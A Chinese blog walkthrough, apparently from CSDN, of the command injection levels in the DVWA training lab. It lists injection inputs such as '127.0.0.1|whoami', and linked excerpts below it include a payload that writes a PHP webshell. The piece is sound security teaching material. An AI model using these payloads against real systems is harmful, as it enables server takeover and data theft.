DVWA通关之命令注入(command injection)

最新推荐文章于 2024-07-08 12:41:22 发布
最新推荐文章于 2024-07-08 12:41:22 发布
阅读量622 收藏 11
点赞数
分类专栏: 渗透测试 # 靶机实战 文章标签: 渗透测试 command php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RuoLi_s/article/details/113348047
版权
本文详细介绍了DVWA中的命令注入漏洞,从低到高四个难度等级的过关思路,并分析了不同等级下的源代码,揭示了过滤机制的不足。文章强调了命令执行漏洞的类型和相关系统函数,提醒开发者注意命令注入的安全风险。
摘要由CSDN通过智能技术生成

DVWA通关之命令注入(command injection)

原文链接请点击:https://www.cnblogs.com/ruoli-s/p/14340551.html

难度等级:low

过关思路

  1. 我们先将其难度设置为low,看到其界面如下:

image-20210128141119846

  1. 通过分析得知,该功能是输入一个IP地址,然后通过ping进行测试,先输入127.0.0.1www.baidu.com测试如下:

127.0.0.1

image-20210128141414768

www.baidu.com

image-20210128141609752

  1. 可以看到,IP地址和域名都是能够ping通的,接下来就是使用命令拼接测试了,

输入127.0.0.1 | whoami

image-20210128142225176

命令注入成功。

  1. 命令汇总,经过测试,以下命令均可注入成功。

127.0.0.1|whoami

127.0.0.1&whoami

127.0.0.1000 || whoami

127.0.0.1 && whoami

  1. 注意:有空格和无空格有时会有意想不到的效果

  2. 做完了当然得看一下源码:

image-20210128143009680

  可以看到,该代码没有对用户的输入做任何的过滤,直接使用shell_exec函数执行用户输入,这是非常危险的。

难度等级:medium

过关思路

  1. 这里过关思路和low一致,也没啥可说的,我们主要看一下源码就行。
  2. 源代码如下:

image-20210128143630947

  通过分析,可以看出,medium关卡比low关卡多了一个黑名单。其通过数组的方式将&&;进行了过滤,即将其替换为。但是,这种过滤基本上还是跟没有过滤差不多,因为黑名单里的过滤太少了,黑名单也不安全。

难度等级:high

过关思路

  1. 上手先测试几个前面的payload,发下好多都被过滤了,但是还有几个可以用:

127.0.0.1 || whoami

127.0.0.1|whoami

127.0.0.1000||whoami

image-20210128154801468

  1. 我们直接看源代码:

image-20210128154709468

  可以看到,这次的黑名单过滤明显的多了起来,但是也发现(可能是故意给我们漏出来的😂),其在过滤的时候,没有过滤|而是过滤了|+空格,所以,该代码只是遇到单单一个|,不会进行过滤。

难度等级:impossible

最低0.47元/天 解锁文章
RuoLi_s
关注
  • 0
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA命令注入Command Injection
弱弱的小雨鸟
01-21 1万+
命令注入Command Injection),是指在某些需要输入数据的位置,还构造了恶意的代码破坏了原先的语句结构。而系统缺少有效的过滤,最终达到破坏数据、信息泄露甚至掌控电脑的目的。许多内容管理系统CMS存在命令注入漏洞。   解决乱码问题 在文本框中输入”ip address”后结果显示为乱码,如下图所示。 解决此问题的方法:在DVWA-master\dvwa\includes
DVWA--Command Injection
weixin_56440174的博客
06-14 1011
命令注入是利用系统弱点获取对系统的访问权限,以执行恶意代码、获取用户数据和参与其他活动。命令注入常用的参数有&&、&、|、||、;、%0a(换行符的URL编码)1.; 各命令的执行给果,不会影响其它命令的执行。换句话说,各个命令都会执行,但不保证每个命令都执行成功。 2.&& 若前面的命令执行成功,才会去执行后面的命令。这样可以保证所有的命令执行完毕后,执行过程都是成功的。 3.|| ||是或的意思,只有前面的命令执行失败后才去执行下一条命令,直到执行成功一条命令为止。 4.| |是管道符号。管道符号改
白帽工具箱:DVWA中的命令注入Command Injection)解析与防护策略
最新发布
技术随笔
07-08 757
注入Command Injection)是一种严重的安全漏洞,攻击者通过将恶意命令注入系统,能够执行未经授权的操作。这种攻击通常发生在应用程序直接使用用户输入构建系统命令的情况下。在DVWA(Damn Vulnerable Web Application)环境中学习命令注入,可以帮助安全研究人员了解其原理和防护策略。
DVWA-命令注入Command Injection
qyy970525的博客
11-20 429
DVWA-命令注入Command InjectionCommand InjectionLow相函数介绍漏洞利用Medium漏洞利用1.127.0.0.1 & ls&&和&的区别127.0.0.1 &;& lsHigh漏洞利用127.0.0.1 |lsImpossible Command Injection Command Injection,即命令注入,是指通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的。PHP命令注入攻击漏洞是PH
dvwa命令注入
qq_44159634的博客
12-12 2354
dvwa命令注入命令行执行时过滤不完全时会导致命令注入 常用连接符 &&与&:前后命令都执行 |:执行后面的命令,前面命令不执行 low: 输入一个ip,可以看出是ping一下ip payload:127.0.0.1 | ls -an medium 过滤了&&,&和|都没有过滤 high 看别人的wp后,发现"| "有个空格。。。所以直接把空格去了就行了 命令注入绕过方式 https://blog.csdn.net/weixin_395
DVWACommand Injection命令注入通关教程
weixin_30527551的博客
08-01 666
日期:2019-08-01 16:05:34 更新: 作者:Bay0net 介绍:利用命令注入,来复习了一下绕过过滤的方法,还可以写一个字典来 fuzz 命令注入的点。 0x01、 漏洞介绍 仅仅需要输入数据的场合,却伴随着数据同时输入了恶意代码,而装载数据的系统对此并未设计良好的过滤过程,导致恶意代码也一并执行,最终导致信息泄露或者正常数据的破坏。 用户的一切输入都是...
DVWA命令注入Command Injection
qq_54537919的博客
06-25 763
DVWA命令注入Command Injection) 原理 low、 medium、 high
DVWA通关攻略(适合新手)
夜思红尘的博客
04-12 9095
这里是于网络安全入门的靶场DVWA,适合新手
DVWA之SQL注入
m0_67393157的博客
07-28 481
DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如。
DVWA靶机通关攻略第二——命令注入
小飞飞的博客
03-07 802
DVWA靶机命令注入详细教学
DVWA靶场通关实战
qaq517384的博客
11-28 2232
Brute Force Command Injection CSRF File Inclusion File Upload Insecure CAPTCHA SQL Injection SQL Injection Weak Session IDs XSS (DOM) XSS(Reflected) XSS(Stored) CSP Bypass JavaScript
DVWA靶场通关Command injection
m0_56010012的博客
03-10 627
命令注入Command Injection),是指在某些需要输入数据的位置,还构造了恶意的代码破坏了原先的语句结构。而系统缺少有效的过滤,最终达到破坏数据、信息泄露甚至掌控电脑的目的。许多内容管理系统CMS存在命令注入漏洞。 命令执行定义:当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system,exec,shell_exec等,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。 形成原因:脚本语言优点是简洁,方便,
DVWA--Command injection命令注入
weixin_50342860的博客
08-19 327
目录风险lowmediumhigh修复 风险 对一些函数的参数没有进行严格的过滤,利用函数中的参数,将恶意的命令拼接到正常的命令当中,使之返回一些敏感信息。 命令连接符 command1 && command2 先执行command1后执行command2 command1 | command2 只执行command2 command1 & command2 先执行command2后执行command1 以上三种连接符在windows和linux环境下都
DVWA通关--命令注入command injection
箭雨镜屋
12-13 2163
low 通关步骤 1、输入127.0.0.1试一下有没有回显 有的 2、输入127.0.0.1 | whoami 命令注入成功 3、尝试写入木马 payload:127.0.0.1 | echo "<?php assert($_POST[ele]);?>" > e1.php 这边注意,我试了echo后面的内容不加引号,或者加单引号,都没有文件生成。网上找到的echo的资料中也都是双引号。 submit之后无回显 4、服务器上看当前卡目录下有文件e1.p
DVWA--Command Injection(命令执行)--四个等
1stPeak's Blog
10-29 3883
Command Injection,也就是我们常说的命令执行,DVWA共有四个等 索引目录 Low Medium High Impossible Low 源代码: <?php if( isset( $_POST[ 'Submit' ] ) ) { // Check Anti-CSRF token checkTok...
DVWA 靶场之 Command Injection命令执行)原理介绍、分隔符测试、后门写入与源码分析、修复建议
Welcome To Myon'Blog !
02-26 3242
代替 localhost :在操作系统的配置文件中,通常将 localhost(本地主机名)与 127.0.0.1 绑定在一起,这样在应用程序中使用 localhost 时,实际上是在使用本地回环地址,用于访问本机上运行的网络服务和应用程序。在操作系统中,“ &、|、&&、|| ” 都可以作为命令连接符使用,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令。:对服务器和应用程序进行安全配置,闭不必要的服务和功能,限制可执行命令的范围。
DVWA-Command Injection(Medium)
七月_的博客
10-22 368
文章目录Command Injection(Medium)代码分析 Command Injection(Medium) 代码分析 <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $target = $_REQUEST[ 'ip' ]; // Set blacklist $substitutions = array( ...
DVWA_Command Injection(命令注入)
yaowink的博客
05-14 846
命令注入是一个非常大的漏洞,基本上有这个漏洞,系统就可以很容易被拿下。 一、首先,进入DVWA Security 改impossible为Low并提交。 进入Command Injection页面 点击View Source查看源码,源码非常简单,就只有ping,没有任何过滤 在Command Injection页面输入127.0.0.1提交,会显示 输入127.0.0.1&&ipconfig会显示dvwa宿主机的ip地址和DNS 127.0.0.1后..
dvwa command injection
03-16
DVWA 中,command injection命令注入)是一种常见的漏洞类型,攻击者可以通过向 Web 应用程序发送恶意输入来在服务器上执行任意命令。 下面是一些漏洞利用的基本步骤: 1. 打开 DVWA,并导航到“Command ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值